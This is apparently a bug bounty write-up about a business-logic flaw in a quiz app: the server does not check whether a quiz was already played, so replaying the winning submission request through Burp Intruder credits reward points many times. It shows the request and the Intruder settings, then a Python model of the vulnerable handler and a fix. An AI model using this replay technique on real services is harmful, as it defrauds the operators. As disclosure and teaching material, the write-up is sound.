
INCREASING REWARD POINTS N NUMBER OF TIMES

BUG: BUSINESS LOGIC

Case Study

As this was a private program, all illustrations of the vulnerability use example.com as the host.

The application lets users play quizzes and win reward points, and those points can be spent like money to play further quizzes.

Example: 10 reward points = Rs 1

To play a quiz you need to pay Rs 5, or you can pay 50 reward points, and so on. While registering you get 50 reward points for the first-time signup. There is also one free quiz per day where you can earn points.

Example: 5 correct answers = 5 points, 10 correct answers = 10 points

The minimum number of correct answers needed to earn reward points is 5.

POC

Let's select a free quiz to earn some points. I managed to get 5 correct answers and was awarded 5 points.

This is the HTTP request that submits your answers:

POST /endpoint HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
Cookie: _
Upgrade-Insecure-Requests: 1

csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=on

Intercept the request in Burp Suite and send it to Intruder.

Now increase the threads to 25, select the Null payloads type in Intruder, and set the payload count to the number of times you want the reward points to be credited again.

done.

The root cause: there is no check whether the quiz has already been played by this user. The server only counts the number of right answers in each submission and awards points, so every replay of the same winning request is credited again.
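To make the missing check concrete, here is an added example (not the program's code) that models the submission handler in Python: the vulnerable handler credits every replay, while the fixed handler claims the (user, contest) pair atomically before crediting, so a 25-thread replay yields one credit. The quiz, answer key, user ID and contest ID are constructed for the example.

```python
import threading
from concurrent.futures import ThreadPoolExecutor

MIN_CORRECT = 5   # from the write-up: fewer than 5 correct answers earns nothing

# Constructed sample data: one free quiz with 10 questions and its answer key
# (placeholder contest_id, not the program's real contestId).
ANSWER_KEY = {"contest-1": [1, 2, 2, 3, 4, 1, 3, 2, 4, 1]}


def score(contest_id, chosen):
    """Points = number of correct answers, but only once MIN_CORRECT is reached."""
    correct = sum(1 for k, c in zip(ANSWER_KEY[contest_id], chosen) if k == c)
    return correct if correct >= MIN_CORRECT else 0


class RewardStore:
    def __init__(self):
        self._lock = threading.Lock()
        self.points = {}      # user_id -> reward points
        self.played = set()   # (user_id, contest_id) pairs already credited

    def submit_vulnerable(self, user_id, contest_id, chosen):
        # Mirrors the bug: right answers are counted and credited, but nobody
        # asks whether this user already played this quiz, so replays pay again.
        pts = score(contest_id, chosen)
        with self._lock:
            self.points[user_id] = self.points.get(user_id, 0) + pts
        return pts

    def submit_fixed(self, user_id, contest_id, chosen):
        # Check-and-claim in one critical section: 25 parallel replays still
        # produce exactly one credit. In a real backend this is a unique
        # constraint / atomic insert on (user_id, contest_id), not a lock.
        key = (user_id, contest_id)
        with self._lock:
            if key in self.played:
                return None   # replay rejected, nothing credited
            self.played.add(key)
            pts = score(contest_id, chosen)
            self.points[user_id] = self.points.get(user_id, 0) + pts
        return pts


def total_after_replay(fixed, n=25, user_id="alice", contest_id="contest-1"):
    """Replay one winning submission n times concurrently; return the user's total."""
    chosen = [1, 2, 2, 3, 4, 0, 0, 0, 0, 0]   # exactly 5 correct -> 5 points
    store = RewardStore()
    handler = store.submit_fixed if fixed else store.submit_vulnerable
    with ThreadPoolExecutor(max_workers=25) as pool:
        list(pool.map(lambda _: handler(user_id, contest_id, chosen), range(n)))
    return store.points.get(user_id, 0)
```

Running `total_after_replay(fixed=False)` credits 125 points for 25 identical requests, while `total_after_replay(fixed=True)` credits 5.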

For queries, ping me on:

Twitter : https://twitter.com/wisdomfreak1

LinkedIn: https://www.linkedin.com/in/saddam-hussain-01766a148/
